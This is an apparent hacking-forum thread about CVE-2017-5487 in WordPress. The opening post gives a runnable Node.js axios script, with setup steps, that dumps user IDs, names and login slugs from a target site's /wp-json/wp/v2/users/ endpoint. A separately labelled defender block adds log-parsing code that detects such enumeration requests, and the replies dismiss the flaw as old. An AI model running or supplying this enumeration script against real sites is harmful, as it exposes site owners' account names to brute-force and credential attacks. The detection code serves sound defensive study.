WordPress User Disclosure (CVE-2017-5487)
by concac - Friday June 16, 2023 at 08:48 PM
#1
Hi guys, I will share some good things about this vulnerability.

Reveal WordPress accounts via /wp-json/wp/v2/users/ using JavaScript to dump the account name and post name.

Sensitive information disclosure: CVE-2017-5487

wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 prior to 4.7.1 allows remote attackers to obtain sensitive information via a request to wp-json/wp/v2/users.

Vulnerability level: 5.3 MEDIUM

Here is the result:

[Image: 903122173.png]

How to use?

Run the following command to install the Axios library:
npm install axios

If you don't have npm, install it from here: https://nodejs.org/en

node file.js

const axios = require('axios');

const url = "";  // Base URL of the site to check (no trailing slash)
const payload = "/wp-json/wp/v2/users/";

axios.get(url + payload)
    .then(response => {
        // The endpoint answers with a JSON array of user objects
        const users = response.data;
        if (users.length > 0) {
            console.log("*-----------------------------*");
            users.forEach(user => {
                console.log("\n[*]ID  : " + user.id);
                console.log("\n[*]Name : " + user.name);
                console.log("\n[*]User : " + user.slug);  // user_nicename, which defaults to the login name
                console.log("\n[*]Url : " + user.url);
                console.log("");
            });
            console.log("*-----------------------------*");
        } else {
            console.log("\n[*]No user");
        }
    })
    .catch(error => {
        console.error(error);
    });
Reply
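Defender-side example added here (not part of the post above or of any project's code): a small log check that flags requests to the users endpoint the post describes, covering both the /wp-json/wp/v2/users route and the ?rest_route=/wp/v2/users query form; the log lines are constructed samples.

```javascript
// Added example (not from the post above): spot WordPress REST user-enumeration
// requests in access logs. Both the pretty route (/wp-json/wp/v2/users) and the
// query-string route (/?rest_route=/wp/v2/users) are covered.
// SAMPLE_LOG holds constructed combined-format lines; the IPs are documentation ranges.

const COMBINED_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/;

function parseLine(line) {
  const m = COMBINED_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Returns true when the request target addresses the users collection or a single user.
function isUserEnumRequest(target) {
  let u;
  try {
    u = new URL(target, "http://base.invalid"); // base is only needed to parse a relative path
  } catch {
    return false;
  }
  if (/\/wp-json\/wp\/v2\/users(\/|$)/i.test(u.pathname)) return true;
  // searchParams.get() already percent-decodes, so %2Fwp%2Fv2%2Fusers is caught too
  const restRoute = u.searchParams.get("rest_route") || "";
  return /^\/?wp\/v2\/users(\/|$)/i.test(restRoute);
}

function findUserEnumeration(lines) {
  return lines.map(parseLine).filter(r => r && isUserEnumRequest(r.target));
}

// Per-source summary: "served" counts 200s, i.e. requests that actually got the user list.
// A 401/403 on the same route means the endpoint is already restricted for that caller.
function summarizeBySource(hits) {
  const bySource = {};
  for (const h of hits) {
    const s = bySource[h.ip] || (bySource[h.ip] = { requests: 0, served: 0 });
    s.requests += 1;
    if (h.status === 200) s.served += 1;
  }
  return bySource;
}

const SAMPLE_LOG = [
  '203.0.113.7 - - [16/Jun/2023:20:48:01 +0000] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 1834 "-" "axios/1.4.0"',
  '203.0.113.7 - - [16/Jun/2023:20:48:02 +0000] "GET /?rest_route=%2Fwp%2Fv2%2Fusers&per_page=100 HTTP/1.1" 200 1834 "-" "axios/1.4.0"',
  '198.51.100.2 - - [16/Jun/2023:20:49:10 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 9021 "-" "Mozilla/5.0"',
  '198.51.100.2 - - [16/Jun/2023:20:49:11 +0000] "GET /about-our-users/ HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
  '192.0.2.9 - - [16/Jun/2023:20:50:00 +0000] "GET /wp-json/wp/v2/users/1 HTTP/1.1" 401 93 "-" "curl/8.1.2"',
];

console.log(summarizeBySource(findUserEnumeration(SAMPLE_LOG)));
```

A source with served > 0 obtained the user list; sources that only collect 401/403 on this route show the restriction is working.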
#2
https://www.exploit-db.com/exploits/41497
Reply
#3
old shit
Reply
#4
this is old and you can just use wp-scan
Reply
#5
(06-23-2023, 08:10 PM)Mister-Kitty Wrote: this is old and you can just use wp-scan

There are quite a few old versions; I want to share with those who don't know.
Reply
#6
thanks for zero day
Reply